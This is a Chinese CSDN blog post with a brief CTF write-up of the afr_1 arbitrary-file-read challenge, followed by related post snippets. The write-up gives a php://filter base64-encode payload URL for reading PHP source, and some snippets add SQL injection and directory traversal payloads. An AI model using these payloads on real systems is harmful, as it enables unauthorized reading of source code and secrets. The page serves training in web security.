[第一章 web入门]afr_1

最新推荐文章于 2024-01-25 17:28:26 发布

evil_ming

最新推荐文章于 2024-01-25 17:28:26 发布

阅读量689

点赞数

文章标签：安全经验分享

本文链接：https://blog.csdn.net/evil_ming/article/details/124621552

版权

打开靶机

唔，很怀念...

通过构造url编码来将php代码以base64加密形式输出

http://081547cc-be9c-485e-94eb-b4dee6cae7e6.node4.buuoj.cn:81/?p=php://filter/convert.base64-encode/resource=flag

强烈推荐从学长get到的 cyberchef 虽然进入的时候会有点迟钝，但是yysy功能很丰富，就让人很有收集到很多工具的满足。

解码后得到flag

over.

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

evil_ming

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

【N1BOOK】[第一章 web入门] wp

{OvEr}的博客

11-25

4379

【N1BOOK】[第一章 web入门]常见的搜集 wp 打开页面就是这样的我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp 扫目录工具dirsearch/御剑，这里我用的是dirsearch。我们一个个访问一下，他说flag在/flag1_is_her3_fun.txt,那我们就访问一下得到第一半flag，继续访问 index.php~ 得到第2半flag，继续访问 .index.php.swp，打开文件发现第3半flag ..

BUU-N1BOOK-Web

楼阁de猫的博客

12-11

1195

web入门[第一章 web入门]常见的信息搜集[第一章 web入门]粗心的小李 [第一章 web入门]常见的信息搜集考查知识点： 1.常规文件：robots.txt 2.gedit备份文件 3.vim备份文件首先看robots.txt：访问一下这个文件得到flag1 再看一下原始文件ihdex.php，发现什么都没有，之前用dirsearch扫了很多东西出来，试了/.git发现也不对，这里就看到书上讲到了gedit备份文件，它是以 ~ 为后缀的，试试index.php~，有东西了，拿到flag

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF[第一章 web入门]afr_1

hivjianxian的博客

11-22

562

ctf题解

buuct—[第一章 web入门]afr_1

weixin_52620919的博客

10-18

1121

以上是题目找大佬文章拜读一下说是利用php伪协议的不太理解原理 PHP向用户提供的指定待打开文件的方式，是一个文件流 PHP的Filter机制，可对目前的协议进行一定的处理，比如将当前文件流的内容进行Base64编码。使用方法php://filter/read=convert.base64-encode/resource=xxx 利用Filter机制，构造形如以上的攻击数据可以读取文件，拿到各种文件的源码构造解题payload php://filter 读取源代码并进行base64编码输出，.

BUUCTF [第一章 web入门]afr_1

woshicainiao666的博客

08-21

303

题目告诉我们是任意文件读取，看到?p=hello 我们将hello换成flag，得到下图。我们想到利用php伪协议看源代码有没有隐藏信息。将源代码以base64的形式输出。然后解码得到flag。

C#人脸识别+虹软AFR_FSDK_Demo_仅供项目实战学习

07-10

使用到的虹软的SDK包中，提供了人脸识别的库，它的名字叫face_recongnition.dll，我们找到它的SDK文档。来建立各个结构体和API的C#映射...这个结构体是FD识别的输出结构体，我们在上一章节标记人脸时使用了此结构体。

AFR.zip_RP Java_afr 48a_cad java_java cad_them

09-19

A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...

《从0到1：CTFer成长之路》书籍配套题目-[第一章 web入门]任意文件读取漏洞

weixin_46703850的博客

02-23

1529

《从0到1：CTFer成长之路》书籍配套题目，来源网站：[《从0到1：CTFer成长之路》](https://book.nu1l.com/)

【第一章 web入门]afr_1 1】任意文件读取

最新发布

carrot11223的博客

01-25

866

任意文件读取/下载漏洞（Arbitrary File Read/Download Vulnerability），是指攻击者可以通过某些漏洞，绕过应用程序的限制，直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞，从而读取或下载他们本来无权访问的文件，如密码、私钥、证书等，会提供攻击者更多可用信息，提高被入侵的风险。

N1Book-第一章Web入门-任意文件读取漏洞-afr_1

抒情诗

05-08

374

这个是传统的任意文件读取漏洞，可以利用php的本地文件包含（Local File Include）实现，使用php的伪协议进行文件读取；或者利用php文件读取函数。本题为Nu1L团队编著的《从0到1：CTFer成长之路》配套题目。来源网站：https://book.nu1l.com/这里可能没有include文件包含，而是使用。没源码不好分析，这里应该逻辑也不大难。造成的文件读取漏洞。

[第一章 web入门]afr_1 解题思路

xiyuanyue的博客

10-10

187

1、通过dirsearch 扫描，发现存在flag.php和index.php。/* 这会以大写字母输出 www.example.com 的全部内容 *//* 这会和以上所做的一样，但还会用 ROT13 加密。index.php 文件内容自动跳转到/?2、通过伪协议读取内容。flag.php 内容。

NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp

居上

06-29

350

afr_1 payload http://192.168.60.134/?p=php://filter/convert.base64-encode/resource=flag 这句话的意思是我们用base64编码的方式来读文件index.php；这时页面会显示出源文件index.php经过base64编码后的内容，然后经过base64解码就可以看到flag； BP base64解码得到flag ...

BUUCTF N1BOOK [第一章 web入门]

Sk1y的博客

03-26

3743

sql盲注脚本目录穿越 session伪造源码泄露

【图解HTTP】二、了解Web及网络基础

qq_41906009的博客

10-24

239

使用HTTP协议访问Web、 HTTP的诞生、网络基础TCP/IP、与HTTP关系密切的协议：IP、TCP和DNS、负责域名解析的DNS服务、各种协议与HTTP协议的关系、URI 和 URL；本文主要介绍 Web 是建立在何种技术之上，以及 Http 协议是如何诞生并发展的。使用 HTTP 协议访问 Web ...

[第一章 web入门]afr_2

qq_52963704的博客

03-16

1232

[第一章 web入门]afr_2—个人写题日记打开网页，发现是只有一个img图片查看网页源码，可以发现图片img的路径，结合题目描述，可以知道这是一个任意文件读取漏洞打开img.gif所在的目录使用../返回到当前目录的上层目录最后打开flag文件，下载后得到flag ...

《从0到1：CTFer成长之路》书籍配套题目[第一章 web入门]SQL注入

wuyaowangchuan的博客

11-19

2036

这道题没有过滤，超级简单文章目录手注sqlmap跑进入环境手注 b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1' http://b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1%27%20and%201=1%20%23 id=1%27%20and%201=2%20%23 说明是字符型注入然后开始注入 ?id=1%27.

N1BOOK第四关摸鱼：[第一章 web入门]afr_1

weixin_45571987的博客

12-02

2700

BUUCTF：[第一章 web入门]afr_1寻找考点构造解题payload解码base64编码得到flag关于php伪协议寻找考点由题目我们可以得知本题考点是php伪协议（其实知道是文件读取漏洞也不知道会用到php://filter的伪协议来读取源码的文件构造解题payload php://filter 读取源代码并进行base64编码输出，不然会直接当做php代码执行就看不到源代码内容了。下面我们构造url，下面是通用格式http://127.0.0.1/cmd.php?file=ph

AFR_FSDK_FACEMODEL

11-10

AFR_FSDK_FACEMODEL是虹软人脸识别SDK中的一个结构体，用于存储人脸特征数据。该结构体包含两个成员变量：pbFeatur和FeaturSiz。其中，pbFeatur是一个指向人脸特征数据的指针，FeaturSiz是人脸特征数据的长度。通过...